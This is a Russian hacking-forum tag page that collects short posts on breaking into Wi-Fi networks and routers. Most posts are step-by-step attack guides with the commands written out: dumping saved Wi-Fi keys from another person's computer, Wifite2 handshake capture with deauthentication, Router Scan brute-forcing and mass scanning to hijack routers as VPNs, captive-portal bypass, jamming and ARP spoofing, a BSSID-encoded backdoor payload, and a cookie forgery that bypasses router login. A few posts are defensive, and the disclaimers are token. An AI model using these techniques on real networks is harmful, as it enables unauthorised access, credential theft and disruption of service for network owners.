Новости и объявления.
- Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. XAKERSAY.COM
Search the Community
Showing results for tags 'взлом wifi'.
-
Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете узнать пароль от Wi-Fi роутера без какого-либо взлома. Давайте на минуточку представим, что вам в руки попал чей-то компьютер, на котором вам нужно узнать пароль от сети Wi-Fi, к которому он подключен. Сегодня мы покажем вам, как это сделать ! Погнали! 1. Вызываем командную строку введя "cmd" в поиске. 2. Нажимаем на "Запуск от имени администратора". 3. Затем в командной строке пишем "netsh wlan show profiles". После чего вы узнаете название сети. 4. Далее вводим "netsh wlan show profile name="название сети" key=clear". Сам пароль от Wi-Fi будет показан в поле "Key Content". Далее вам остается сделать скриншот или сохранить в избранное, чтобы не проделывать данные действия повторно. Вот таким вот интересным способом вы можете заполучить практически любой пароль от Wi-Fi, если для этого будет созданы определенные условия. Не нужно париться с программами, со взломами, все делается быстро и без каких-либо следов и лишних телодвижений. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной небольшой статье я хочу рассказать о том, как создать точку доступа для перехвата данных. Зачастую люди не хотят заботиться о безопасности своих данных, и подключаясь к открытому Wi-Fi сильно рискуют отдать свои данные в руки злоумышленника. Сейчас будет рассмотрен способ создания файловой точки доступа для подобного перехвата. Установка: git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git cd WiFi-Pumpkin chmod +x installer.sh sudo ./installer.sh --install wifi-pumpkin Будет запущен графический интерфейс, зайдите в раздел "Seetings" и дайте название вашей точке доступа, затем перейдите в "Activity Monitor Settings" и поставьте галочки на пунктах "HTTP-Requests", "HTTP-Authentication" и "Pumpkin Proxy". С помощью данной небольшой программы вы можете легко перехватывать данные из сети. Поэтому если вы хотите потренироваться в этом или найти методы защиты от подобных перехватов, то советую попробовать использовать данную программу по своему назначению. Вполне возможно, что она вам пригодится. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как запретить доступ к сети любой программе на компьютере. При необходимости вы можете заблокировать доступ в интернет определенному ПО. Сделать это можно при помощи встроенных в систему функций. В решении данной задачи нам поможет брандмауэр Windows, который, по сути, является одним из самых простых способов заблокировать программе доступ к Интернету, не требующий установки каких-либо сторонних средств. Погнали! 1. Первым делом нажимаем "Win+R" и вводим команду "firewall.cpl" 2. Затем слева нажимаем "Дополнительные параметры", после чего переходим в "Правила для исходящего подключения" 3. Здесь в правой части нажимаем на "Создать правило", выбираем "Для программы", указываем путь, ставим галочку на "Блокировать подключение", затем "Далее", указываем "Имя" и нажимаем "Готово". Это отличный способ, чтобы запретить приложениями доступ в сеть. Это поможет значительно повысить безопасность вашего компьютера и сохранность ваших данных. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной статье я хочу рассказать вам о том, как взломать Wi-Fi при помощи Kali Linux. Для начала взлома вам понадобится сетевой Wi-Fi адаптер, который имеет поддержку режима мониторинга, совместимый с Kali Linux. Wifite2 установлен в Kali Linux по умолчанию. Лучше всего использовать данный дистрибутив на виртуальной машине или же прямо на компьютере, который имеет обновление загрузочной записи и возможность выбора операционной системы. По сути, Wifite2 можно установить в любом другом дистрибутиве, но лучше всего он будет работать если у вас Kali Linux, так как он является наиболее распространенным. При условии, что Wifite2 не установлен в вашей системе, вы можете скачать эту утилиту из репозитория на GitHub. Погнали! 1. Для того, чтобы установить Wifite2, в терминале введите команды, показанные ниже, для клонирования репозитория и запуска инсталляции: git clone https://github.com/derv82/wifite2.git cd wifite2 ls sudo python setup.py install 2. Для запуска используем следующую команду: ./Wifite.py Для того, чтобы получить подробную информацию по использованию введите команду wifite -h Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! Сегодня мы поговорим о том, как при наименьших усилиях получить наибольший результат, чем, в нашем случае, является бесплатный интернет. Для реализации нам понадобится программа Router Scan. 1. Сначала программа сама попробует подобрать пароль и логин под роутер соседа, но тут не всегда выходит желаемый результат. 2. Если же проге не удалось узнать пароль и логин, то тут нам поможет использование некоторых багов и слабостей каждого из вида роутеров, что позволит нам либо получить информацию, либо обойти стороной авторизацию. Сперва нам потребуется просканировать сети в радиусе действия. Для этого запускаем программу, она спросит, хотим ли мы отправлять полученные данные в общую базу данных, ну и попросит подтвердить пользовательское соглашение. 3. Теперь переходим в последнюю вкладку в программе и выставляем 2 галочки. Теперь следует подождать, пока программа определит WiFi сети. 4. Когда появится сеть, которую мы хотели взломать, жмём на ней ПКМ, потом "Obtain key with WPS" и в появившемся окне "Start Audit". 5. После этого начнётся процесс подбора логина и пароля. Просто ждём, когда программка добродушно предоставит нам нужные данные. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной статье я расскажу вам о том, как отследить какие приложения используют интернет-трафик. Если вас беспокоит ограниченный тарифный план сотового оператора, когда у вас нет доступа к Wi-Fi, или вы хотите убедиться, что определенные приложения не отсылают данные обратно на свои сервера, когда они этого делать не должны – воспользуйтесь приложением GlassWire для Android. Приложение GlassWire тщательно отслеживает использование данных другими приложениями – вы можете видеть, какие приложения на вашем смартфоне используют больше всего интернета (загружая и отправляя данные), можете получать немедленные предупреждения, когда новое приложение начинает связываться с интернетом, и многое другое. Для этого на главной странице приложения необходимо выбрать типсети и период, за который будут отображаться данные о расходе трафика. Если какие-то программы используют соединение в данный момент, это будет отображаться соответствующими иконками. Помимо этого, вы можете установить собственный лимит расхода интернет-трафика. В таком случае приложение будет уведомлять вас, если вы его превысите. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной статье хочу рассказать о том каким образом хакеры могут без труда взламывать Wi-Fi при помощи Kali Linux. Для начала потребуется сетевой Wi-Fi адаптер с поддержкой режима мониторинга, совместимый с Kali Linux. Wifite2 установлен в Kali Linux по умолчанию. Рекомендую установить этот дистрибутив на виртуальной машине или прямо на компьютере с обновлением загрузочной записи и возможностью выбора операционной системы. Если Wifite2 не установлен в вашей системе, вы можете скачать эту утилиту из репозитория на GitHub. Для этого введите в терминале команды, показанные ниже, для клонирования репозитория и запуска инсталляции: $ git clone https://github.com/derv82/wifite2.git $ cd wifite2 $ ls $ sudo python setup.py install Запуск $ ./Wifite.py Теперь введите команду wifite -h для подробной информации по использованиюю. С помощью такой программы, возможно взламывать практически любую сеть, поэтому рекомендую ее к использованию. Это одна из самых эффективных и простых в освоении утилит. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В этой статье хочу рассказать, как можно узнать пароли от всех Wi-Fi сетей к которым вы когда-либо подключались. Windows хранит данные про все сети, к которым подключалось устройство, в том числе и пароли от них. При желании вы можете получить к ним доступ с помощью командной строки. Для этого вам необходимо выполнить следующие пункты: 1. Откройте командную строку от имени администратора. 2. Введите команду «netsh wlan show profiles», чтобы посмотреть список всех Wi-Fi сетей, к которым вы подключались ранее с этого устройства. 3. Выберите имя нужной сети и введите команду «netsh wlan show profile name=Имя_сети key=clear». Вместо «Имя_сети» введите название Wi-Fi сети, пароль от которого необходимо узнать. Если оно состоит из нескольких слов, необходимо взять его в кавычки. После этого в командную строку будет выведена вся известная компьютеру информация о Wi-Fi сети, а пароль от неё будет показан возле пункта «Содержимое ключа». Теперь вы можете использовать его для подключения, если ранее этот пароль никто не изменял. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры, в этой статье хочу рассказать о том, как заблокировать постореннего человека, подключенного к вашей сети. Необходимо попасть в меню управления своим Wi-Fi роутером, выполните команду «ipconfig» в командной строке, скопируйте адрес из раздела «Основной шлюз», после чего вставьте его в адресную строку браузера и авторизуйтесь в системе, используя данные на задней части вашего роутера. На разных маршрутизаторах отключение устройства от Wi-Fi сети происходит немного по-разному. Например, если вы пользуетесь роутером TP-Link, зайдите в меню «Беспроводной режим» → «Статистика беспроводного режима» и нажмите «Запретить» возле нужного адреса. После этого необходимо перейти в раздел «Фильтрация MAC-адресов» и нажать кнопку «Включить», чтобы блокировка начала работать. Если же вы пользуетесь роутером от Asus, после перехода в меню маршрутизатора необходимо зайти в раздел «Фильтрация адресов» и вставить блокируемый адрес, предварительно скопировав его из раздела «Карта сети» → «Клиенты». В настройках роутеров других производителей названия параметров могут отличатся, но, в целом, порядок действий везде один и тот же. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информаци.
-
Инструкция по установке и поиску роутеров: Скачиваем Router Scan с официального сайта (http://stascorp.com/load/1-1-0-56) Теперь нам понадобятся диапазоны ip адресов. Взять их можно с этого сайта (https://4it.me/getlistip), введя название любого города. Полученные диапазоны нужно вписать в соответствующее поле в верхней панели Router Scan. В "Scan ports" можно оставить значения по умолчанию. В "Scanning modules" нужно выбрать только три первых пункта. После нажатия "Start scan" во вкладке "Good Results" начнут появляться потенциально уязвимые устройства с полученными авторизационными данными. Если при подобной проверке ip диапазона вашего города вы нашли в "Good Results" свой роутер, то уже на этом этапе лучше обратиться в техподдержку или вручную обновить прошивку роутера, скачав её с официального сайта. Подключению к роутеру и поднятие VPN Подключение к уязвимому роутеру реализуется за счет браузера. В поисковую строку нужно вписать запрос в виде : Откроется форма входа, в которую нужно вписать данные из колонки "Authorization" в Router Scan. Далее идет процесс поднятия VPN. У каждого роутера разный интерфейс, а некоторые данную функцию вообще не поддерживают. Если объяснять поверхностно, то для начала нужно будет включить службу PPTP вписав придуманные авторизационные данные и выбрав уникальный локальный ip. После чего настроить NAT пробросив порты 1723 и 1729. Подключаться к созданному VPN можно через встроенную службу Windows, которая находится по пути "Пуск" -> "Панель управления" -> "Сеть и интернет" -> "Центр управления сетями и общим доступом" -> "Настройка нового подключения или сети" -> "Подключение к рабочему месту" Выбрав "Использовать моё подключение к интернету(VPN)" нужно вписать ip роутера и придуманные ранее авторизационные данные. Готово, теперь весь трафик атакующего ПК будет идти за счет владельца взломанного роутера. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
В повседневной жизни мы часто сталкиваемся с ситуацией, когда необходимо получить доступ в интернет. В кафе, ресторане или в общественном месте всегда можно найти точку доступа. Нередко попадаются роутеры с «гостевым доступом». Но бывает, что бесплатный Wi-Fi защищен Captive Portal. Иными словами, имеется открытая сеть Wi-Fi, к которой можно подключиться без пароля, но при попытке зайти на любой сайт, нас будет перебрасывать на страницу, где нужно ввести учётные данные, оплатить, подтвердить номер телефона с помощью СМС или что-то похожее. Конечно, желания оплачивать такую услугу совершенно нет, поэтому мы воспользуемся утилитой, которая будет обходить данную защиту. Заходим в терминал и прописываем команды для установки: обновляем пакеты: apt update apt upgrade качаем пакеты: apt -y install sipcalc nmap wget Теперь инструмент: wget https://raw.githubusercontent.com/systematicat/hack-captive-portals/master/hack-captive.sh Делаем файл исполняемым и запускаем: chmod u+x hack-captive.sh ./hack-captive.sh После фразы "Pwned! Now you can surf the Internet!", вы можете спокойно пользоваться интернетом. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Привет, хакеры! Сегодня я расскажу о способе заражения жертвы вирусом через сеть Wi-Fi. Итак, у нас есть в наличии backdoor payload. Не шифрованный и без всяких прочих приблуд способных защитить нас от обнаружения. В данной схеме мы проводим атаку с помощью смены своего BSSID, это означает что вы сможете сменить свой BSSID и инфицировать свою цель шаг за шагом. На заметку: Вы можете использовать MANA-Toolkit: https://github.com/sensepost/mana. Допустим у нас есть пейлоад “fec8b00011ddc00945f1”. Что же нам необходимо делать далее? Шаг 1 Нам необходимо создать фейковую точку доступа, которую мы назовём "Фейк" (что бы вам было понятнее) и мак адрес, у неё будет 00:fe:c8:b0:00:11 Мак адрес 00:fe:c8:b0:00:11 это наш загружаемый пейлоад т.к. название нашего пейлоада “fec8b00011ddc00945f1”Это секция пейлоада “fec8b00011ddc00945f1”Шаг 2 Система с беком сканит ESSID нашего фейка и дампит BSSID для неё. Наш код должен сделать так: fe:c8:b0:00:11 ==> fec8b00011Шаг 3 Атакующая система создаёт фейковую точку доступа с именем "Фейк" и маком 00:dd:c0:09:45:f1 Мак-адрес 00:dd:c0:09:45:f1 это наш инжектируемый пейлоад “ddc00945f1”Это секция пейлоада “fec8b00011ddc00945f1”Шаг 4 Система с бекдором должна дампить данную секцию BSSID или мак dd:c0:09:45:f1 ==> ddc00945f1 После данных шагов со сканом мы имеем пейлоад fec8b00011ddc00945f1 в инфицированной системе. Теперь, разобравшись как работает данный метод мы рассмотрим команды для создания фейк AP: ifconfig wlan0 down iw reg set BO ifconfig wlan0 up iwconfig wlan0 txpower 30 С помощью этих команд мы увеличиваем мощность нашей AP. Примечание: эти команды нужно писать до создания wlan0mon для вашего wlan0. Создания монитора для wlan карты это обязательный шаг для создания фейковой AP. Делаем монитор этой командой: "airmon-ng start wlan0", если не работает, то используйте команду iwconfig и посмотрите название своего адаптера. Далее пойдут команды с кратким описанием: airmon-ng start wlan0 - запускаем интерфейс; airbase-ng -a 00:fe:c8:b0:00:11 –essid “Fake” -I 10 -0 wlan0mon - делаем первый кусок пейлоада; sleep 15 - дайте точке поспать 15 секунд; killall airbase-ng - если у точки бессонница; airbase-ng -a 00:dd:c0:09:45:f1 –essid “Fake” -I 10 -0 wlan0mon - второй кусок пейлоада; sleep 15 - дайте точке поспать 15 секунд; killall airbase-ng - если у точки бессонница. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Глушение WiFi-сети с помощью LANs Начнем с LANs. Она умеет не только глушить WiFi, но и другие вещи: Шпионит за пользователямиИндивидуально травит таблицы ARP целевой машины, роутера и при необходимости — сервера DNSРадиус действия глушения сильно зависит от мощности адаптера, но у скрипта есть настройки, которые позволяют глушить всех подряд или только одного клиента. Здесь все просто: скачиваем и устанавливаем зависимости и качаем сам скрипт. $ sudo apt install -y python-nfqueue python-scapy python-twisted nbtscan $ git clone https://github.com/DanMcInerney/LANs.py.git $ cd LANs.py/ Теперь можно запускать наш скрипт, чтобы начать глушение WiFi. $ python lans.py -u -p Ключи -u и -p означают активное обнаружение цели для ARP-спуфинга и вывода всех интересных незашифрованных данных, которые они отправляют или запрашивают. Опции -ip здесь нет, поэтому будет выполнено ARP-сканирование сети и его результаты будут сравниваться с результатами живого «неразборчивого» захвата. В результате получится список всех клиентов сети. Нажимайте Ctrl + C для остановки поиска, когда построите карту сети и посмотрите списки подключенных клиентов. Для тех же целей, кстати, можно успешно использовать Nmap (см. также Nmap: обнаружение хостов сети). Точечный вариант глушения будет выглядеть так: $ python lans.py --jam --accesspoint роутера> -s для пропуска> Здесь: —jam — глушить все или некоторые беспроводные точки 2,4 ГГц и клиентов в пределах досягаемости; если необходимо, то вместе с этим можно использовать дополнительные аргументы (ниже);-s — так можно задать MAC, который не будет деавторизован;—accesspoint — тут можно ввести MAC конкретной точки доступа, которая будет выступать в качестве цели.Глушение всех сетей Wi-Fi будет выглядеть так: $ python lans.py --jam Глушение только одной точки доступа: $ python lans.py --jam --accesspoint Здесь тоже можно задать некоторые дополнительные опции: -ch — ограничить глушение одним каналом;—directedonly — не отправлять пакеты деаутентификации на широковещательные адреса точек доступа, а только парам из клиента и хотспота;—accesspoint — так можно указать конкретную точку доступа в качестве цели.Глушение WiFi-сети с помощью WiFiJammer Для глушения WiFi можно также использовать утилиту wifijammer. Она крайне проста в использовании, так что обсуждать здесь почти нечего: без параметров она просто будет заглушать все, что найдет в радиусе досягаемости адаптера. Чтобы не задеть своих, можно исключить некоторые MAC-адреса с опцией -s. Установка wifijammer: $ git clone https://github.com/DanMcInerney/wifijammer.git $ cd wifijammer/ $ sudo python2 wifijammer.py --help Запуск wifijammer: $ sudo python2 wifijammer.py -s для исключения> На этом все! Теперь, с помощью рассмотренных инструментов вы сможете с легкостью глушить WiFi. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Взлом роутера обычно является либо самой простой, либо самой сложной задачей - его сложность варьируется от ввода имени пользователя и пароля по умолчанию, и ты максимально заебёшься, пытаясь попасть внутрь роутера по telnet или ssh. В обоих этих случаях перебор паролей не очень полезен, но это довольно простой метод, мы ведь не ищем лёгких путей, да? Однако я скажу тебе следующее: Это все еще роутер, который я использовал в своей домашней сети, потому что он предоставляется моим интернет-провайдером, и поскольку он является одним из основных поставщиков в моей области, многие люди страдают от этих уязвимостей. Ну ладно, теперь к делу. ЭТАП I. НАЙДИ IP РОУТЕРА. Так как это самый простой шаг, и есть бесчисленное множество способов сделать это, я просто приведу несколько различных возможностей: Проверка сетевых настроек с помощью панелей настроек ОСИспользование ipconfig в Windows и ifconfig на машинах Unix из терминалаИспользование Fuzzer в качестве инструмента обнаружения цели.Найденный мной IP роутера - 192.168.0.1 ЭТАП II. СОБЕРИ ТРАФФИК. Я решил, что хороший способ начать, будет исследовать веб-сервер роутера для чего-то за пределами того, что видно невооружённым глазом. По этой причине я использовал HTTPView и проанализировал трафик от первой попытки входа в систему. Чтобы помочь себе, я применил некоторые фильтры, чтобы избавиться от медиа и стилей ответов с сервера. Вот результат, который я добыл: Этой информации нам хватит. ЭТАП III. ПРОАНАЛИЗИРУЙ ТРАФФИК И НАЙДИ УЯЗВИМОСТИ. Теперь, когда у нас есть нужное количество данных, мы должны проанализировать его, чтобы увидеть, наткнулись ли мы на что-то интересное. Сразу можно игнорировать все файлы jQuery, а также языковые файлы или, по крайней мере, не начинать поиск оттуда. Поскольку я работаю в Chrome, я не могу анализировать ответы прямо из HTTPView, поэтому мне нужно реплицировать запрос в Rest и выполнять там анализ. Есть этот интересная штука, которую я нашел в /menu.html Присмотрись хорошенько. Хотя определение функции readCookie отсутствует, можно с уверенностью предположить, что она считывает файл cookie, а userData-это имя этого файла cookie. Из строки 247 мы можем сделать вывод, что значение этого файла cookie должно быть root. Чтобы изменить куки, я использовал расширение EditThisCookie и добавил файл куки с уже упомянутым именем и значением и вуаля, мы внутри.. Всё так просто? ЭТАП IV. ПРОСКАНИРУЙ РОУТЕР НА НАЛИЧИЕ ДРУГИХ ROOT'ОВ. Если мы попытаемся перемещаться в любом месте, мы встретим тот же экран входа в систему. Есть что-то еще, необходимое для изменения настроек роутера. Однако, у нас есть доступ к гораздо большему количеству страниц, поэтому я думаю, что стоит сделать сканирование на маршрутизаторе. Для этого я буду использовать сканер с уже установленным файлом cookie userData=root. В addiotion я включу опцию "направленное сканирование" на вкладке второго пилота, чтобы сканер полагался на мои действия в качестве ввода. После запуска сканера перейдите к 5-10 страницам на маршрутизаторе, которые требуют входа в систему, например /basicSetup.html и / или basicDHCP.html и пусть инструмент делает свою работу. После того, как траффик перестал поступать, мы можем проанализировать результаты для интересных выводов. Для этого я предпочитаю сортировать результаты по пути, чтобы убедиться, что я не пропустил ни одного важного файла или каталога. И через некоторое время я столкнулся с этим: ЭТАП V. ПОЛУЧИ ПОЛНЫЙ КОНТРОЛЬ. DocsisConfigFile.xml - это обычно файл, который содержит кучу полезной информации о конфигурации маршрутизатора, посмотрим, что внутри: Да, всё так просто. Это определенно работает - файд содержит много интересной информации, включая имя пользователя и пароль в обычном тексте, благодаря которым мы и получили полный доступ. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Привет, хакеры, в данной статье покажу способ взлома Wi-Fi. Это самый простой способ. Есть 2 версии wifite, использовать будем вторую — Wifite2 Работать будем на Kali Linux. Помимо Кали необходим Wi-Fi адаптер. Некоторые Wi-Fi адаптеры могут не подходить и придётся использовать два адаптера. Как в моём случае(TP-Link 722). Если 2 адаптера, программа может спросить какой выбрать. Выбираете адаптер для сканирования сетей. Скачиваем wifite2: git clone https://github.com/derv82/wifite2.git Заходим в директорию: cd wifite2 И запускаем: ./Wifite.py Начался мониторинг сетей. Когда появиться сеть, останавливаете мониторинг (ctrl + c) Выбираете свою сеть обозначив номер 1 сети или выбрав сети от и до. Например: 2 или 2-5. Начинается захват хэндшейка. Мы выкидываем какого-то пользователя с его сети(да,теперь вы видели всё) при попытке переподключиться он обязан ввести пароль. А сессия останавливается и этот пароль сохраняется в текстовом файле. Выводы: если вы отключились от своей точки, задумайтесь. И старайтесь сократить дальность wifi до минимума, не заходя за стены. Взлом чего-либо — незаконно. Я никого ни к чему не призываю, статья написана в ознакомительных целях!
-
Привет, хакеры, продолжаем тему узнавания паролей от беспроводных сетей. В данной статье будет рассказано про способы получения подобной информации на Linux. Как узнать пароль от WiFi на Linux Для подключения к беспроводной сети в Linux Используется либо Network Manager либо WPA Supplicant. Первое является программой с собственным граф. Интерфейсом, а второе подключает компьютер к беспроводной сети, используя стандартную консоль. Оба инструмента сохраняет все настройки в открытую. Однако перед освоением команд, необходимо воспользоваться граф. Интерфейсом, необходимо это для получения информации об подключениях компьютера к различным сетям. Нажимаем на значок беспроводной сети возле часов и тыкаем “Сетевые соединения”. Отлично, видно сети к которым компьютер подключался и подключен прямо сейчас. Для получения пароля берем одну из сетей и нажимаем на ней “Изменить”. После нажимаем на вкладку “Защита Wi-Fi”, где отмечаем пункт “Показывать пароль” Для выполнения данной функции не требуется пароль администратора, то есть выполняется любым пользователем. Ранее оговаривалось, что программа сохраняет все данные в открытом виде: В папке /etc/NetworkManager/system-connections/. Просмотреть файлы ls -l /etc/NetworkManager/system-connections/ Для просмотра названий и паролей вводим: sudo egrep -h -s -A 9 --color -T 'ssid=' /etc/NetworkManager/system-connections/* Вторая программа, использующая командную строку, для проверки подключений хранит всю свою информацию по адресу - /etc/wpa_supplicant.conf. Однако запустить программу можно и при помощи ключа, который указан после файла с неизвестным названием и положением. В случае автоматический загрузки данной программы, есть возможность изучения файла - /etc/rc.local на наличие команды, которая поможет в поиски настроек беспроводной сети. Данный файл можно найти, взглянув на статус службы: systemctl status wpa_supplicant.service В случае ручного запуска программы, поиск осуществляется в данных категориях: grep supplicant ~/.bash_history Просмотр содержимого папки программы: ls -l /etc/wpa_supplicant/ Код для вывода содержимого файла: cat /etc/wpa_supplicant/wpa_supplicant.conf
-
Привет, хакеры, может произойти такая ситуация, что будет утерян пароль от беспроводной сети, к которой подключен пользователь, возможно просто хотите узнать к каким сетям компьютер был подключен раньше. В данной и следующей статье я расскажу, как проверить эти данные для Windows и Linux соответственно. Данная инструкция предназначена для Windows. Как узнать пароли WiFi Узнать пароль от сети, к которой подключен компьютер пользователя в момент проверки, можно при помощи графического интерфейса. Для этого переходим в “Центр управления сетями и общим доступом”. Далее кликаем на название сети, скриншот: Появляется новое окошко, тыкаем “Свойства беспроводной сети”, после чего нажимаем на вкладку “Безопасность” и отмечаем пункт “Отображать вводимые знаки” Теперь о том, как проверить к каким сетям компьютер был подключен ранее и какие использовал при этом пароли. Рассмотри несколько способов. Первый заключается в использовании консоли Windows, а второй в использовании специального ПО. Начнем с первого варианта и откроем консоль при помощи сочетании клавиш “Win + R” и напишем команду “cmd”, теперь можно пользоваться командной строкой. Чтобы просмотреть возможные профили, необходимо прописать: netsh wlan show profile Идем дальше, для просмотра паролей всех сетей: netsh wlan show profile name=* key=clear Для просмотра пароля определенной сети: netsh wlan show profile name="имя_сети" key=clear Заменяем настоящее имя сети на необходимое, к примеру: netsh wlan show profile name="dlink" key=clear В данном примере просматривается 4 профиля и их пароли. Но данный компьютер подключался к большему количеству беспроводных сетей. Для этого используется второй способ со специальным программным обеспечением, а именно программа – WirelessKeyView. Программа с закрытым исходным ходом, однако все равно является абсолютно бесплатной. Никаких особых вещей рассказывать про инструмент не нужно, здесь все интуитивно понятно. Здесь видим все сети и пароли, к которым был подключен компьютер. В следующей статье ждите информацию по Linux.